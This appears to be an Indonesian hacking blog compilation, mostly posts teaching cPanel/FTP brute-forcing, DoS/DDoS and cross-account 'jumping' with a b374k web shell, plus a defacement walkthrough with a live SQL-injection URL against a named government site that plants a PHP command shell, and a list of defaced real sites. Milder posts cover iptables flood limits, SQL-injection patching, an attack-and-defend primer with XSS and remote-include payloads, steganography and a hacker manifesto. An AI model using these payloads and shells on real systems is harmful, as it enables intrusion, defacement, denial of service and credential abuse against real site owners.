sebetulnya teknik ini sama dengan postingan itu

sama2 jumping

buat ngebrote user dan password cpanel, ftp, ataupun whm

oke langsung aja yah :

1. download shell yg ada di sini
2. masukan passwordnya biar bisa akses shellnya

3. klik menu BruteForce
4. isikan list password yg anda suka
yg sering ane gunain

Password List :

12345
123456
1234567
12345678
123456789
1234567890

nanti hasilnya kaya gini :

Hasilnya:

[ james0baster@james0baster.web.id ]# Seraaaanngg …
[ james0baster@james0baster.web.id ]# Serangan selesai , nihk username = wonder dan passwordnya = 12345
[ james0baster@james0baster.web.id ]# Serangan selesai , nihk username = pond dan passwordnya = 12345

coba login aja ke cpanelnya
174.120.9.58/cpanel

Posting Bruteforce dengan shell ditampilkan lebih awal di james0baster.web.id.

oke langsung aja yah 😀 :

1. download shell yg ada di sini
2. masukan passwordnya biar bisa akses shellnya

3. klik menu DOS
akan menampilkan form seperti berikut :

4. isi fild “host”
fild “host” bisa di isi dengan domain ataupun ip target

5. isi fild “Length (seconds)”
fild “Length (seconds)” di isi dengan 99999999999 atau sebanyak2nya

6. coba ping ke domain atau ip target
kalo belum rto berarti ga bisa di DOS
coba serang dengan shell yg berada di server lain
jadi serangannya terdistribusi atau sering disebut DDOS
yah bisa sampe 10 shell lah buat liat perubahan yang pasti

Posting Tutorial Dos Attack untuk menjurus ke DDOS ditampilkan lebih awal di james0baster.web.id.

kalo ini teknik sama suka lompat ke user lain satu server

oke mulai aja yah tutornya 😀

1. download shell yg ada di sini
2. masukan passwordnya biar bisa akses shellnya

3. klik menu readable
akan menghasilkan hasil scanan user yg readable

4. copy salah satu list
contoh : /home/gracepcc/public_html

5. klik menu explore

6. pastekan readable user yg sudah kita copy ke View File/Folder

5. cari file konfigurasi koneksi ke database

6. login ke mysqlnya dengan mengklik menu

7. cari table user
ubah password user tersebut

8. cari tau domain user tersebut
ada beberapa cara :
liat file konfigurasi ke database
liat di dalam databse
atau bisa membuka domainygadashell.com/~user/
contoh: domainygadashell.com/~gracepcc/

9. login sebagai admin.
kalo mau tau tempat loginnya bisa liat di shell, kan bisa liat ftpnya dia tapi ga bisa upload

cara mengatasi upload maka uploadnya via halaman admin web tersebut

jadih deh shell anda beranak pinak

Posting Tutorial buat para jumper ditampilkan lebih awal di james0baster.web.id.

ngedit b374k biar 4 in 1, ga perlu banyak3 upload cukup 1 file sudah mematikan, fitur yg ditambahkan = bruteforce, readable, DOS,
dan pengunaan password untuk mengakses shell tersebut 😀

passwordnya = devilzc0de

atau bisa ubah sendiri password hashnya dalam bentuk md5

UPGRADE SCRIPT

http://xjamesx.tk/404.txt

ditambahkan DOS attack

NB Script di encode biar ukurannya jadi lebih kecil aja

kalo mau decode bisa make script php ini :

gzinflate(base64_decode($scripygdiencode))

Posting Ngedit Script b374k ditampilkan lebih awal di james0baster.web.id.

—Teknik steganografi meliputi banyak sekali metode komunikasi untuk menyembunyikan pesan rahasia (teks, audio atau gambar) di dalam berkas-berkas lain yang mengandung teks, image, bahkan audio tanpa menunjukkan ciri-ciri perubahan yang nyata atau terlihat dalam kualitas dan struktur dari berkas semula. Metode ini termasuk tinta yang tidak tampak, microdots, pengaturan kata, tanda tangan digital, jalur tersembunyi dan komunikasi spektrum lebar.

—Tujuan dari steganografi adalah merahasiakan atau menyembunyikan keberadaan dari sebuah pesan tersembunyi atau sebuah informasi. Dalam prakteknya, kebanyakan pesan disembunyikan dengan membuat perubahan tipis terhadap data digital lain yang isinya tidak akan menarik perhatian dari penyerang

Proses Steganografi Audio Mengunakan Sound Forge

A. Tahap Pertama

1. —Menyiapkan File Suara carrier (pembawa pesan)

—2. Hapus suara pada Channel kedua File Suara carrier seperti gambar dibawah ini :

—3. Dengan cara dabel klik channel kedua dan tekan tombol delete pada keybord

B. Tahap Kedua

1. —Menyiapkan File Suara Pesan (yang akan di sembunyikan)
2. —Mengcopy channel pertama pada Suara pesan dan ditaruh ke Channel kedua Suara Carrier seperti gambar dibawah :

Melakukan Peningkatan Oktaf Pada Suara Pesan

1. —Memblok bagian channel Suara pesan dengan cara dabel klik
2. —Klik menu Effects => Pitch => Shift , seperti gambar dibawah :

—3. Ubah Sametones to shift pitch by menjadi 20 seperti digambar berikut

—Yang mengakibatkan suara pesan dari 43 detik menjadi 13 detik

C. Tahap Ketiga

1. —Melakukan Pemotongan dan penyebaran Suara pesan.
2. —Memblok dan Mengcutnya, seperti gambar di bawah ini :

3. —Susun dengan bantuan 1. Even Tool hinga menjadi seperti gambar dibawah ini :

D. Tahap Ke Empat

1. —Mengubah Volume Suara pada Channel Suara Pesan.
2. —Blok channel suara pesan dengan dabel klik pada channel suara pesan
3. —Klik menu Process => Volume, seperti gambar dibawah ini :

4. —Ubah volume suara pesan menjadi 5% dari suara aslinya

Prosses Steganografi Selesai

—Suara pesan akan tersamarkan oleh suara carrier dengan tampilan gelombang suara seperti gambar berikut :

Dan Hasil Suaranya Sebagai Berikut :

Proses Decript

—Agar Pesan dapat didengar oleh si penerima pesan maka sipenerima pesan melakukan decript terlebih dahulu agar dapat mendengarkan pesan rahasia yang tersimpan pada suara carrier

—Caranya dengan :

1. —Mendelete Channel Suara carrier
2. —Mengembalikan Ukuran Volume Suara
3. —Mengabungkan potongan-potongan pesan dengan Event Tool
4. —Mengembalikan oktaf suara pesan

Proses Steganografi Audio Mengunakan S-Tool

1. Bukalah Program S-Tools yang telah sediakan    dalam dengan Mendouble Clik icon S-tools.exe

2. Setelah itu anda akan melihat tampilan awal seperti ini.

3. Lalu, Setelah itu Drag lah File yang anda inginkan kedalam bidang kosong S-Tools sebagai media penyembunyian (carrier audio). Dalam hal ini penulis akan mendrag Sebuah File Wav dengan nama Indonesia Jaya.wav.

4. Akan tampil jendela Hiding. Isikan pada kotak PASSPHRASE sandi rahasia yang anda inginkan. Dalam hal ini akan mengisikannya dengan karakter “suhada”.

5. Pada kotak VERIFY PASSPHRASE. Isikan juga sandi yang sama.

6. Kemudian Pilihlah jenis Algoritma pada kotak Encryption Algorithm. Dalam hal ini penulis menggunakan IDEA.
7. Klik ok untuk memulai proses Steganografi.
8. Proses Steganografi akan berlangsung. Selama Proses, jendela Action akan menunjukan kemajuan prosesnya. Perhatikan Bagian Progess.

9. Setelah proses berakhir, akan tampil jendela baru yang bernama “hidden data”

10. Untuk menyimpannya, klik kanan pada bidang “hidden data” dan pilih menu Save As.

11. Pada kotak Save As yang tampil, beri nama file yang baru pada kotak File Name. pada hal ini penulis memberikan namanya dengan Result.WAV.

12. Klik tombol Save.

13. File carrier dan file hidden harus memiliki ukuran yang sama, seperti pada gambar dibawah ini akan ditujukan ukuran file tersebut.

14. Untuk me-reveal sama dengan proses embedding, buka jendela result klik kanan klik reveal. Isi password yang sama dengan saat embedding Seperti pada gambar dibawah ini:

15. Maka akan muncul file audio yang akan telah di steganografi, seperti pada gambar dibawah ini:

16. Dan save file carrier dengan nama yang sama yaitu IndonesiaJaya.WAV

17. Setelah melakukan proses reveal maka file audio yang sudah di strganografi tidak akan ditemukan lagi

Isi Pesan:

Ni hao?

Wo tu hen hao, ni jiao Moch Suhada

====================================

Shìshàng zhiyou mama hao

Di dunia ini, Ibu yang terbaik

Dinyanyikan oleh : Kevin

Shìshàng zhiyou mama hao

Di dunia ini hanya ibu yang terbaik

You ma de háizi xiàng gè bao

Anak yang memiliki ibu bagaikan harta

Tóu jìn mama de huáibào

Berada dalam pelukan ibu

Xìngfú xiang bùliao

=======================================

Dào xiang – zhou Jiélún

Wangi Padi – Jay Zhou

dui zhe ge shi jie, ruo guo ni you tai duo de bao yuan

jika kau terlalu banyak mengeluhkan dunia ini

die dao le, jiu bu gan ji xu wang qian zou

saat terjatuh kau tak berani kembali melangkah

wei shen me, ren yao zhe me de cui ruo, duo luo

mengapa manusia begitu lemah ?

qing ni da kai dian shi kan kan

coba kau lihat di televisi

xie-xie

terima kasih

Posting Steganografi Audio ditampilkan lebih awal di james0baster.web.id.

kali ini gw mau share beberapa teknik2(POC) buat ngedeface .

kalo yang sudah pada tau teknik2 ini jangan pada ngina

yah maklum nubie mau coba bikin artikel :p

yang sudah baca yah jangan lupa komen2nya

yah itung2 belajar bareng 🙂

ok mulai aja deh ke tutor

hal yg diperlukan :

1. berdoa
2. siapin makanan ringan
3. dan segelas kopi (java)
4. koneksi internet + komputernya 🙂

nah kalo udah pada siap liangsung pergi ke om google untuk melakukan pencarian dengan dork :

kemudian pilih deh web target yang memiliki vulnerability 🙂

target : http://www.inacif.gob.gt/index.php?showPage=125&nwid=-7’+union+select+1,2,0x3C6120687265663D22687474703A2F2F6A616D6573306261737465722E7765622E6964223E6A616D6573306261737465723C2F613E,4,5,6,load_file(‘/etc/passwd’),8,9,10/*

setelah masuk ke website targget ubah url nya yg tadinya load_file(‘/etc/passwd’) menjadi

“<?php echo \'<pre>\’;system($_GET[\’cmd\’]);echo \'</pre>\’;?>”

dan diakhir url ditambahkan

+INTO+OUTFILE+”lokasi direktory(folder) yang permisionya 777/namashell.php”/*

real target : http://www.inacif.gob.gt/index.php?showPage=125&nwid=-7’+union+select+1,2,3,4,5,6,”<?php echo \'<pre>\’;system($_GET[\’cmd\’]);echo \'</pre>\’;?>”,8,9,10+INTO+OUTFILE+”/home/inacif/www/design/default/james0bastershell.php”/*

setelah berhasil membuat shell dari sql injection sebaiknya di coba terlebih dahulu apakah berhasil

atau tidak dengan menjalankan perintah ls -al pada cmd=

real target : http://www.inacif.gob.gt/design/default/james0bastershell.php?cmd=ls -al

upload deh shell yg lebih familiar buat anda digunakan seperti saya b374k.php 😀 dengan perintah

download sebagai berikut :

dan hasilnya sebagai berikut :

bisa backconnect sama bind, lumayan buat DDOS atau apalah soalnya servernya ga make firewall.

kalo belom bisa ngeroot bisa pake teknik jumping karena di dalemnya ada 21 readable user directory

berikut hasil URL jumpingan dari http://www.inacif.gob.gt/ ke  http://www.cinde.com.gt/

URL : http://www.inacif.gob.gt/design/default/b374k.php?y=/home2/cinde/cinde-www/webcontrol/

dan berikut hasil defaceannya 😀

• http://www.cinde.com.gt/webcontrol/james0baster.html
• http://www.amchamguatebusiness.com/media/Image/Julio_ago/james0baster.html
• http://www.asociacioncambiandovidas.org/media/Image/james0baster.html
• http://sanjuansacatepequez.com.gt/media/Image/james0baster.html
• http://merka.com.gt/media/Image/james0baster.html
• http://difoto.com/media/Image/james0baster.html
• http://web.ecssa.com.gt/media/Image/james0baster.html
• http://dmarie.com.gt/media/Image/james0baster.html
• http://www.horcalsa.com/media/Image/james0baster.html
• http://aplytek.com/media/Image/james0baster.html
• http://www.ffacsa.com/media/Image/james0baster.html
• http://www.palixcan.com/media/Image/james0baster.html
• http://www.rototec.com.gt/media/Image/james0baster.html
• http://www.pinbol.net/media/Image/james0baster.html
• http://www.nisfessa.com/media/Image/james0baster.html
• http://www.fmglobo.com.gt/media/Image/james0baster.html
• http://www.artgala.org/media/Image/james0baster.html
• http://www.cognos.com.gt/media/Image/james0baster.html
• http://www.saluvita.com.gt/media/Image/james0baster.html
• http://www.copredeh.gob.gt/media/Image/james0baster.html
• http://adinmsa.com/media/Image/james0baster.html
• http://elmastil.com/media/Image/james0baster.html
• http://starkids.com.gt/media/Image/james0baster.html
• http://www.inacif.gob.gt/design/default/james0baster.html

dan masih banyak lagi :p

sehubung banyak yg minta script scaner buat tuh web lewat YM oke ane berikan nih

http://www.inacif.gob.gt/design/default/james0basterscaner.php

NB : JANGAN RUSAK WEBNYA KALO MAU DIFACE JANGAN INDEXNYA, DEFACE HIDDEN AJA.

ITU BUAT BELAJAR BARENG2 JANGAN SERAKAH

Posting POC buat ngedeface++ ditampilkan lebih awal di james0baster.web.id.

#!bin/sh
#Menghapus semua Rule
iptables -F
iptables -X
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
#blok paket syn yang dicurigai jahat
iptables -N synjahat
iptables -A INPUT -p tcp –syn -j synjahat
iptables -A synjahat -m limit –limit 1/s –limit-burst 3 -j ACCEPT
iptables -A synjahat -j DROP

kemudian jalankan di konsole/terminal

root@bt:~# sh closesyn.sh

2. Mencegah Ping Flood attack
Buat sebuah file bernama closeping.sh yang isinya sebagai berikut untuk mencegah serangan ping flood

#!bin/sh
#Menghapus semua Rule
iptables -F
iptables -X
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
#blok paket ping(icmp) yang dicurigai jahat
iptables -N pingjahat
iptables -A INPUT -p icmp -j pingjahat
iptables -A pingjahat -m limit –limit 1/s –limit-burst 2 -j ACCEPT
iptables -A pingjahat -j DROP

root@bt:~# sh closeping.sh

coba lakukan testing dengan perintah

root@bt:~#ping [target] -s 6500

Ok sekian dulu. Thank’s jika ada yang kurang jelas silahkan tanya 😀

_{This article was originally published in forum thread: Mencegah serangan Syn & Ping Flood Attack (DOS) started by bilanganbiner}

Posting Mencegah serangan Syn & Ping Flood Attack (DOS) ditampilkan lebih awal di james0baster.web.id.

Jangan cuma bisa attack. Tapi juga harus bisa defend. 

Langsung aja..

Ini patch untuk mencegah serangan SQL Injection di halaman dinamis pada PHP + MySQL.

Biasanya halaman dinamis ini
bentuknya kayak gini http://uhui.com/vuln.php?id=[Input_Angka]

Bentuk umum kode di halaman dinamis php untuk membaca database melalui MySQL :

Injection Flaw terjadi karena inputnya gak kefilter dengan baik. Sehingga input ‘$id’ yang seharusnya diisi dengan (biasanya) angka bisa diisi dengan query SQL.. Yang mengakibatkan query SQL tersebut dieksekusi sehingga injector bisa melakukan berbagai hal misalnya membaca isi database, membaca suatu file di situs tersebut, dll.

Nah, untuk mencegah hal tersebut sebaiknya kita memfilter inputnya sebelum diproses dengan SQL.

Contoh kode filternya :

Penjelasan :

Pertama-tama menggunakan error_reporting(0); . Kode tersebut digunakan untuk mendisable error reporting sehingga jika terjadi error tidak keluar pesan error.

Selanjutnya variabel $id disaring dulu menggunakan mysql_real_escape_string yang berfungsi untuk menambahkan slash (\) apabila ada tanda kutip pada input $id.

Setelah disaring dengan mysql_real_escape_string, disaring lagi dengan melakukan pengecekan apakah inputnya berupa angka atau bukan dengan menggunakan kode !ctype_digit . Jika ternyata bukan angka maka akan ditolak. Selain pengecekan input apakah angka atau bukan, dilakukan juga pengecekan apakah inputnya sama atau lebih kecil dari 0 (minus) jika iya maka akan ditolak.

Abis itu baru deh aplikasikan ke syntax SQL-nya.

Untuk lebih jelasnya silahkan baca ulang kode sebelum difilter dan setelah difilter berkali-kali sampai paham.

Posting SQL Injection Flaw Patching ditampilkan lebih awal di james0baster.web.id.

Ditulis oleh: gentoo

“If you know both yourself and your enemy, you can win a hundred battles without a single loss.”

Di berbagai segi kehidupan, sangatlah di butuhkan keseimbangan. Bahkan yang sangat terkenal adalah sebuah ungkapan dari Sun Tzu yang saya tuliskan diatas, mengenali kelemahan musuh adalah penting, tetapi lebih penting lagi mengenali kelemahan diri sendiri, karena dengan begitu kita dapat seimbang dala, bertahan dan menyerang.  Saya harap artikel ini nantinya akan dapat menjadi referensi singkat yang membahas tentang menyerang dan bertahan dalam dunia keamanan web (web security), dan artikel ini diharapkan juga bisa menjadi titik mula bagi yang tertarik dengan keamanan web, sekaligus pembuka mata bagi para programmer web agar sedikit banyak mulai menaruh perhatian pada keamanan aplikasi yang meraka buat.  Artikel ini akan membahas beberapa jenis celah keamanan web yang umumnya selalu menjadi primadon dikalangan para pemerhati keamanan web, tetapi bahasan disini bukan mencakup detil tiap celah, tetapi lebih ke arah Proof-of-concept dari cara bertahan dan menyerang. Disajikan dengan menggunakan PHP sebagai bahasa pemrograman “dynamic”, HTML, serta mysql sebagai “database engine”.  Formatnya pun akan selalu sama, penyajian kode yang memiliki celah, cara memperkuatnya (bertahan) kemudian diikuti dengan bagaimana metode untuk mengexploitasinya. Jangan berharap artikel ini akan mengajarkan anda dari Nol, bagaimana membuat web, mengkode dengan PHP dan mysql, atau penjelasan detil (pengertian-panjang-lebar) tentang setiap celah.  Partisipasi aktif andalah yang akan menentukan apakah artikel ini akan bermanfaat buat anda nantinya

===// Yin-Yang \\===

====// XSS Reflected \\====
kode yang memiliki celah untuk di serang:

——–\\ sweet.php
PHP Code:

echo ‘Selamat Datang’ . $_GET[‘sweet’];

——–//
Adapun kode untuk melindungi adalah dengan menambahkan fungsi “strip_tags” atau “htmlspecialchars” untuk memeriksa variabel tersebut terlebih dahulu.
——–\\sweet-patch.php
PHP Code:

echo ‘Selamat Datang’ . strip_tags($_GET[‘sweet’]);

atau PHP Code:

echo ‘Selamat Datang’ . htmlspecialchars($_GET[‘sweet’]);

——–//

——// Eksploitasi \\——
Code:sweet.php?sweet=<script>alert(“XSS”)</script>

====// XSS Persistent \\====

kode yang memiliki celah untuk di serang:

——–\\ sweet.php
PHP Code:

$sweet  = trim($_POST[‘txtSweet’]);$sweet  = mysql_real_escape_string($sweet);$query  = “INSERT INTO sweet (sweet) VALUES (‘$sweet’);”;

——–//
Adapun fungsi yang digunakan untuk mengamankannya adalah “stripslashes”, “addslashes”, “htmlspecialchars”
——–\\sweet-patch.php
PHP Code:

$sweet = stripslashes($sweet);$sweet = mysql_real_escape_string($sweet);$sweet = htmlspecialchars($sweet);$query = “INSERT INTO sweet (sweet) VALUES (‘$sweet’);”;

——–//

——// Eksploitasi \\——
Code:

sweet.php?sweet=<SCRIPT SRC=http://dare.dev.il/evil.js?<B>Bedanya, xss exploit ini akan tersimpan ke database dan akan selalu di eksekusi setiap halaman sweet.php di load, selanjutnya tinggal keahlian anda berkreasi pada script evil.js

====// File Inclusion \\====

Kode yang memiliki celah untuk di serang:

——–\\berkas.php
PHP Code:

$file = $_GET[‘halaman’];

——–//

Adapun Untuk mengamankan berkas.php, cukup dengan mendefinisikan file yangingin kita include secara pasti.
——–\\berkas-patch.php
PHP Code:

$file = $_GET[‘halaman’];

// hanya mengijinkan sweet.phpif ( $file != “sweet.php” ) {echo “ERROR: File not found!”;exit;}

——–//

|——| Atau untuk melengkapinya, silahkan melakukan serring “Off” pada Directive| allow_url_fopen| allow_url_include| pada php.ini|——

——// Eksploitasi \\——

Code:berkas.php?halaman=http://dare.dev.il/evil.phpSelanjutnya tergantung keahlian anda berkreasi pada script evil.php, agar berbagai perintah dalam evil.php dapat tereksekusi, ada beberapa syarat lain yang harus dipenuhi, dan ini menjadi PR anda untuk mencari tahu.

====// SQL Injection \\====

SQL injection adalah salah satu teknik yang cukup tua untuk dibahas, celah ini pada web aplikasilah yang paling banyak memberikan andil kepada terkuasainya banyak webserver. Celah ini bisa saya bilang multiplatform karena bisa Database dapat berpasangan dengan bahasa permrograman apapun dan berjalan di sistem-operasi apapun.
Untuk teknik ini saya tidak ingin panjang lebar, tetapi khusus untuk celah lawas ini, kode yang akan saya berikan lengkap, dan bagi para pencinta “salin & tempel” akan dengan mudah dapat mengapliaksikannya, hmm sepertinya tidak juga, karena setidaknya kamu harus paham database, membuat tabel dan mengkoneksikannyadengan php
Ok, berikut adalah kode yang telah memiliki tempat sendiri dalam sejarah keamanan aplikasi web 😆

——–//vulnlogin.php

PHP Code:

<table><form name=”member” method=”post” action=”#”><tr><td colspan=”2″><b>Member Login</b></tr><tr><td>Username</td><td><input type=”text” name=”username” value=”” size=”40″></tr><tr><td>Password</td><td><input type=”password” name=”password” value=”” size=”40″></tr>
<tr><td colspan=”2″><input type=”submit” name=”submit” value=”Submit”><input type=”reset” name=”reset” value=”Reset”></td></form></table>
<?phpinclude ‘config.php’; // ini adalah konfigurasi koneksi aplikasi ke database,ga bisa buat? 😆
$username = $_POST[‘username’];$password = $_POST[‘password’];
$q = “SELECT username, password FROM member WHERE username = ‘$username’ AND \password = ‘$password’ “;
$r = mysql_query($q);if (!$r) {print mysql_error();} else {$row = mysql_fetch_row($r);if (($row[0] != “”) && ($row[1] != “”)) {echo “&nbsp;&nbsp;<a href=somerandompagesnameforyou.php>Yeah, you are in!</a>”;} else {echo”<pre> &nbsp;&nbsp;You need to register as a member to login! </pre>”;}}
?>

——–//

dan untuk mengamankannya adalah dengan melakukan filtering pada keduavariabel “username” dan “password”
PHP Code:$username = stripslashes($username);$username = mysql_escape_string($username);$password = stripslashes($password);$password = mysql_real_escape_string($password);|—-| Untuk memperkuatnya, seandainya ada yang terlewat, melakukan setting| “On” untuk| magic_quotes_gpc| pada setting PHP.ini|—-

——// Eksploitasi \\——

Masukkan ‘or ‘1=1” (l33t) pada input box username/password untuk membypasslogin, sehingga rikues akan jadi seperti ini
|—-|
PHP Code:SELECT username, password FROM member WHERE username = ”or’1=1”’ AND password = ”or’1=1”’|—
Selanjutnya, anda simpulkan sendiri

===// Cross Site Requesr Forgery \\===

Kode berikut adalah mempertunjukkan sebuah halaman ganti password untuk admin, yang tidak melakukan pemeriksaan password saat ini, sehingga memungkinkan celah CSRF digunakan.

——–\\ganti.php

PHP Code:

<?php
if (isset($_GET[‘ganti’])) {$pwd_baru = $_GET[‘pwd_baru’];$pwd_baru2 = $_GET[‘pwd_baru2’];
if (($pwd_baru == $pwd_baru2)){$pwd_baru = mysql_real_escape_string($pwd_baru);$pwd_baru = md5($pwd_baru);
$insert=”UPDATE `users` SET pwd = ‘$pwd_baru’ WHERE user = ‘admin’;”;$result=mysql_query($insert) or die(‘<pre>’ . mysql_error() . ‘</pre>’ );
echo “<pre>Password Admin Berubah </pre>”;mysql_close();}else{echo “<pre> Password tidak cocok. </pre>”;}
}?>

——–//
Adapun untuk memperbaikinya adalah, dengan melakukan pemeriksaan password saat ini terlebih dahulu sebelum merubah password

——–\\ganti-patch.php

PHP Code:

<?php
if (isset($_GET[‘ganti’])) {$pwd = $_GET[‘pwd’];$pwd_baru = $_GET[‘pwd_baru’];$pwd_baru2 = $_GET[‘pwd_baru2′];
$pwd = stripslashes( $pwd );$pwd = mysql_real_escape_string( $pwd );$pwd = md5( $pwd );
// Periksa password saat ini (pwd)$qry = “SELECT pwd FROM `users` WHERE user=’admin’ AND pwd=’$pwd’;”;$result = mysql_query($qry) or die(‘<pre>’ . mysql_error() . ‘</pre>’ );
if (($pwd_baru == $pwd_baru2) && ( $result && mysql_num_rows( $result ) == 1 )){$pwd_baru = mysql_real_escape_string($pwd_baru);$pass_new = md5($pwd_baru);
$insert=”UPDATE `users` SET pwd = ‘$pwd_baru’ WHERE user = ‘admin’;”;$result=mysql_query($insert) or die(‘<pre>’ . mysql_error() . ‘</pre>’ );
echo “<pre> Password Admin Berubah </pre>”;mysql_close();}
else{echo “<pre> Passwords Baru tidak cocok atau password lama anda salah. </pre>”;}
}?>

———//

——// Eksploitasi \\——

Adapun cara eksploitasinya adalah melibatkan kelalaian sang admin, umumnya attacker akan mengirim link tersbut ke email, atau melalui forum dsb dengan harapan sang admin akan meng-click-nya.
Code:<a href=http://nice.ang.el/ganti.php?pwd=&pwd_baru=dudul&pwd_baru2=dudul&ganti=ganti#>klik saya</a>

===// Penutup \\===

Oke, saya harap anda semua yang membaca akan pusing, dan disinilah orang-orang terpilih akan mengikis pembaca lainnya, yup, dengan cepat anda akan segera mencoba dan mencari tahu apa yang saya tulis disini, google! sejak awal di luncurkan adalah referensi terbaik.
Pelajari berbagai fungsi-fungsi yang saya singgung diatas, secara pelan dan jangan terburu-buru , selebihnya selamat datang di dunia web aplikasi yang ‘penuh dengan intrik-intrik, dan semoga sedikit dari saya dapat bermanfaat untuk semua. Logika anda sangat di perlukan disini!

===// Reference \\===

[1].google.inc, http://google.com

[2].OWASP, “The Open Web Application Security Project”, http://owasp.org

[3].semua web aplikasi yang telah saya lihat kode php-nya

Copas dari http://ezine.echo.or.id/ezine21/e21_005.txt
dan diambil dari sumber .
Semoga bermanfaat.

Posting Web Security Yin-Yang (Attacking & Defending) ditampilkan lebih awal di james0baster.web.id.

Kami mendayagunakan sebuah system yang telah ada tanpa membayar, yang bisa jadi biaya tersebut sangatlah murah jika tidak dijalankan dengan nafsu tamak mencari keuntungan, dan kalian sebut kami criminal.
Kami menjelajah, dan kalian sebut kami criminal.
Kami mengejar pengetahuan, dan kalian sebut kami criminal.
Kami hadir tanpa perbedaan warna kulit, kebangsaan ataupun prasangka keagamaan, dan kalian sebut kami criminal.
Kalian membuat bom atom, kalian menggelar peperangan, kalian membunuh, kalian berlaku curang, membohongi kami dan mencoba meyakinkan kami bahwa semua itu demi kebaikan kami, tetap saja kami yang disebut criminal.
Ya, aku memang seorang criminal.
Kejahatanku adalah rasa keingintahuanku.
Kejahatanku adalah karena menilai orang lain dari apa yang mereka katakana dan pikirkan, bukan pada penampilan mereka.
Kejahatanku adalah menjadi lebih pintar dari kalian, sesuatu yang tak akan kalian maafkan.
Aku memang seorang hacker, dan inilah manifesto saya.
Kalian bisa saja menghentikanku, tetapi kalian tak mungkin menghentikan kami semua.
Bagaimanapun juga, kami semua senasib seperjuangan.

Posting Manifesto Seorang Hacker ditampilkan lebih awal di james0baster.web.id.